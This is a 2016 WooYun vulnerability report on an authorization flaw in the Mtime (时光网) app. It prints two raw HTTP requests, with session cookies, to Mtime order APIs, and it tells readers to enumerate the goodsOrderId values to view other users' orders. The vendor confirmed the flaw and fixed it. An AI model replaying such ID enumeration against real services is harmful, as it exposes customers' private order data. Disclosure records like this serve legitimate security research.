乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-09: 细节已通知厂商并且等待厂商处理中 2016-05-10: 厂商已经确认,细节仅向厂商公开 2016-05-20: 细节向核心白帽子及相关领域专家公开 2016-05-30: 细节向普通白帽子公开 2016-06-09: 细节向实习白帽子公开 2016-06-24: 细节向公众公开
Mtime时光网越权查看订单
时光网app下载地址 http://feature.mtime.com/mobile/测试的是ios客户端
有两处接口可越权遍历订单#1
GET /ECommerce/GoodsOrderInfo.api?goodsOrderId=7708428 HTTP/1.1Host: api.m.mtime.cnX-MTime-Mobile-CheckValue: 5,1462780658496,80CB2F439C0F418EB3CBD657223B3620Proxy-Connection: keep-aliveAccept-Encoding: gzipCookie: loginEmail=wooyun_222%40163.com; autoExit=; _mi_=411530972117512131043048311531065.16050915425546866C52C46202E4F5FA1B36Connection: keep-aliveX-Mtime-Mobile-DeviceInfo: iPad3,5User-Agent: Mtime iOS App 9.2.4
遍历 goodsOrderId
#2
GET /Service/callback.mi/ECommerce/GoodsOrderGroupInfo.api?goodsOrderId=7708418&t=2016591604916857 HTTP/1.1Host: mall.wv.mtime.cnReferer: http://mall.wv.mtime.cn/X-Requested-With: XMLHttpRequestProxy-Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-cnCookie: Hm_lpvt_e07949f61338e36deb5fc85107e6157b=1462780847; Hm_lvt_e07949f61338e36deb5fc85107e6157b=1462779830,1462780411; _mi_=411530972117512131043048311531065.16050915425546866C52C46202E4F5FA1B36; _tt_=57303f6300fc8c3796a0da61; loginEmail=wooyun_222%40163.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13E238 Mtime_iPhone_Showtime_Hybird/9.2.4(WebView Width 320 Height 568) (Device iPad3,5)
发礼物
危害等级:中
漏洞Rank:10
确认时间:2016-05-10 15:21
已确认, 非常感谢
2016-05-10:已修改